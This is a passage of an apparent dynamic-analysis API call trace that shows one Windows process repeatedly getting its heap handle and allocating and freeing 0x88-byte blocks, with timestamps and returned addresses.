RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.815] GetProcessHeap () returned 0xe30000 [0144.815] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.816] GetProcessHeap () returned 0xe30000 [0144.816] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.816] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0144.817] GetProcessHeap () returned 0xe30000 [0144.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.817] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.818] GetProcessHeap () returned 0xe30000 [0144.818] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.818] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.819] GetProcessHeap () returned 0xe30000 [0144.819] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.819] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.820] GetProcessHeap () returned 0xe30000 [0144.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.820] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0144.821] GetProcessHeap () returned 0xe30000 [0144.821] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0144.821] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.822] GetProcessHeap () returned 0xe30000 [0144.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0144.822] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.823] GetProcessHeap () returned 0xe30000 [0144.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0144.824] GetProcessHeap () returned 0xe30000 [0144.824] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, 